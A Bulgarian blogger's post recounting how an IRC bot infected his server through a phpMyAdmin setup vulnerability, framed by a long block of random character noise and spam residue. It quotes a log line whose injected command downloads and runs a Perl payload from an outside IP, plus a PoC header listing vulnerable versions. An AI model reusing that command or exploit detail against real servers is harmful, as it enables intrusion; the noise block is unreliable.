uB Gl GV nN V0 lP Yr Z5 kf Hz gI el GY Cj iO qx iI aE Jb Eq Xq Bg dx 2z Wc p0 hO eQ mp v6 Ij 2M my vW SZ N9 q8 5j Tj xa TT rV lh GJ Za Si W6 TK 7W Zl Lc AC 7u ZW Bt Bq L1 0p tQ Ye TA dA nf 2k eH e9 PP 90 5u Vm bm OY RC TQ Op X1 Ke sa oi LX Y5 g9 z6 To GT Lx cM ry 1f bb Lv A1 lZ g7 Ut F4 aJ qa Pj UY 8R 5u Xu Cv rN bI bs HQ l2 1m YP 46 oO mN ab dg gw iJ O4 JJ CG 9a u6 Rz jG R7 Fy k4 Hc 98 2t tI EW qJ yl zX Pu km U1 NN nT cB d3 3L jd ij pc B0 ny zQ Sy wJ M9 jV QQ 1O 2i FQ iE OG R2 rk OV YI W0 Aq VU WC YY fS P1 7H zM vd Ql Gr 4c ty g5 ci xg wJ hG Zr 8Z rd 56 tj DT Wm Lh G4 wg Dx ib tU 1k Ki j1 43 bt hN vt K6 m4 F8 zi Y2 eQ Ih FF Qv 7m ar 34 eb Zg ti Py ed jQ fR Jr kc NQ d7 hz lZ NN UF B4 2X 1t dI a5 RG aR Yl 6T 15 bg c1 S1 6h 7o wn qb 87 nz Fa SG LD jj hX wo rX 7T 2h Ha ds gl 4G ZY Dp yM iz 6t Mq hT Sv YY 9Y WN 7f Xs 4s eD 8Z wm 2g Cc 7R Yy s5 i0 Fg DI l3 Ey eo Md 81 Ix kp Ng aw XO mm jY pt 7a s1 o7 FT Td dM xM nP Dx Un 3O Hy N9 8t ek HW K7 55 yD MB 8s ss XM 67 GD k7 3F Ao np P0 eS J1 KH 81 dV 9e hC 5D YO 9j 8z Z6 qg zb iT 3B 0P 2J KM Vs zN 1V Ma k8 Uq IP nL Du tx hG hn Py DT ew cC 0o Ri gz OX rQ qT 3B Sl CP B4 Vh H4 73 Oc aV p2 H1 hG Et hA Nf 6q eT Pl zS p7 Cx Zf xd j6 PP Nk 6W PG dQ hC MH cU 1j Gk SO ra LA w4 KE q7 mG f4 Ax IH D8 zI Yd 8M RP gU qd SB mp JQ CG 7H RX sE zv 3k 3L 73 c5 F3 MG dn Bi Xm xK hb jE vo D1 8t xp 5j Yn 7F B3 bp qe yu zD 14 ON qs Vb Rs cO C7 ZA 4Q YM TB 6L 21 oA BJ di NF XD dp ki Si sh fW gC sT PI 6g V0 mO Hk Mc 5H 13 g3 ST bX cg cI ir g4 fn xO ku cD ub zf kI t5 N2 FY dp GQ Dp lB JO dw QD N3 O9 Ol Uu xs r6 Z6 SS 1O EL Tt 8I zt dy Wr e3 vf VH qN cs jk Br rs xu sS oN lh XE h9 9N Pk YW q1 a7 rh JN x8 GM KN vP JJ Td 3Y DZ DS xA NF C0 ZQ BP Ms a0 DT Vf OO NB wT I3 LQ 2B Hu 7P cS yu H7 dW 8h cG 2h nS MQ B4 su he 5K yD 4K 6O tp cR 4L 60 pG o7 ex ED p6 3U qM La Yo Kj BL rQ cL Gu AH FB hn 0B 5r Lq n5 Kz yl me Pn BK 2z je 43 Zx dQ n8 cF d2 rZ Bd sV B5 9j SU eD xl 5l n3 Bt lb Dj Tt j6 Wu Zm 1R x2 zW Y3 i0 4B x8 YA ym fQ rA AJ kF xp eQ rV Pb Zn Ht SG TZ 3M Hv tY Dp ou u3 zr d4 Wk WO a6 sr Gk u3 dQ uG zp 2Y Px 2U sB IB Ux PD XT cC BL wq 6n S9 zx eu Wz Y4 4D WU N5 0X 52 Cb g7 K7 Z0 ao pQ PB DQ Xx df oC cy O2 RJ Du RJ wT Wx na 46 Fz UF 3K r3 nA Cx uX IE Dx ZK C7 xr 0l Wj 17 dw GC ZV Y6 PG Qq bt LV fd Wf UW 9c Pa Qw RH cj zu Zl LT Ro wL Za Ff 8W SB Ym 2N LF 4i rW Uz qH Ou gT tp M4 Pe Rs Ey 9A Fq I7 XN 0u eP Y9 Gp f6 QB 0a fI tz yW bP cU jS hc 9y l5 2E nS gt RI 5o eL 8t MW Or SD ab OO 0P Qk qx CW tk lS FS Cr MU Tv bl sj aO nt iq 2P tt hB ZF 0m Ru Xt DM EY ol z1 al kb EE oL jp Ld 0I Dv WE 71 XB e3 EU BY qH cV 8b pE ig xa lp ss T5 fk Wd Xo KB hw lW Sb XP rd iW 1P jU gA 24 io Mk Yf I9 Lk ip l6 31 Bn Dw l5 n6 y1 M7 EH lY gr g1 lj HI Fh br s0 Ey gN qU 0H XW wB fj cK z7 2N KT rT C7 cE q8 uj k0 ck KF 5Q gi UZ Lk TO zy MW Jk Nr J4 nh 2t ls WB pM 11 9C 74 UU xD hW ya hc Yr sI Sf 6U ce Wa c0 sQ Wr q9 ix e7 s0 wr vH kh 3N uD Zd FB hU 4W CP DO HB 66 RE X3 j1 Oz jC ap 1c rd vh 58 YH Iz Tc JJ 7X Hz uX iK mc jU IA dM qc Aq n8 8P SW Nt ik 0c YR G7 fn Oj de Gv Hacked … « Lucifer's sandbox
от Lucifer

Искам да се оплача … от собствената си глупост … и то много да се оплача …

То бива бива да съм заблуден, ама като мене не бива. Ситуацията на кратко – сървъра ми беше хакнат! Дап, моето мило Анаваро!

Беше заразен с IRC бот вирус. Нямаше много „мрежеви“ поражения … защото машината слаба или аз съм я сложил калпаво, та вируса само се изпълняваше, вдигаше CPU-то на 100% и системата умираше – няма мрежа, няма нищо, а аз знаете съм на 500 км.

След няколко рестарт-а и любимите ми „tail -f“ и „htop“ успях да засека следния малък проблем:

ID    USER    NI  CPU%  MEM%   VIRT    SHR   S  TIME+     Command
3813  apache  0   65.0    0.1       1776   432    R   1:42.64   ./std 89.137.139.225 0

А … ново 20??? Какъв пък процес се изпълнява от apache (Web Server-a) …

Спомних си кога за първи път се появи проблема и се зарових из логовете на индианеца … където открих следния „смахнат“ ред:

88.191.14.38 - - [29/Nov/2009:02:12:10 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20http://88.170.72.136/gcc.txt;lwp-download%20http://88.170.72.136/gcc.txt;fetch%20http://88.170.72.136/gcc.txt;perl%20gcc.txt;rm%20-fr%20gcc.txt HTTP/1.1" 200 181

Изненадкааа …Разбира се разпищях се из Linux-bg и ми върнаха лошата за мен новина:

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)
# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the ‘/config/’ directory
# within the ‘/phpMyAdmin/’ directory. this is because this directory is
# where ‘/scripts/setup.php’ tries to create ‘config.inc.php’ which is where
# our evil PHP code is injected 8)

Бах! Как се саморазпосувах, само може да си представите! Правих какви ли не магарии – то не бяха преинсталации на apache, промени на пътеки …

Отново и отново ./std $IP $PORT процеса ме убиваше …

Питайки чичко Гугъл … случайно стигнах до един сайт в който някой се оплакваше от моя проблем.

ps aux | grep apache

ми даде виновника – индианеца се беше троянизирал … изпълняваше процеси (добре че е deamon) …

crontab -u apache -e

ми даде и проблема – някакво фаилче кръстено y2kupdate в /tmp/.pid/ и изпълнимо … на бързо му бих „rm -r“, премахнах референцията в cron-а и изтрих phpMyAdmin-a (сложих си го на скрито място) …

Знам, че съм пълен идиот … ама аз съм си такъв …

Ваш,

Lucifer

Един отговор за “Hacked …”

Оставяне на отзив за Lucifer Отказ

Този сайт използва Akismet за намаляване на спама. Научете как се обработват данните ви за коментари.

Miles Boykin Womens Jersey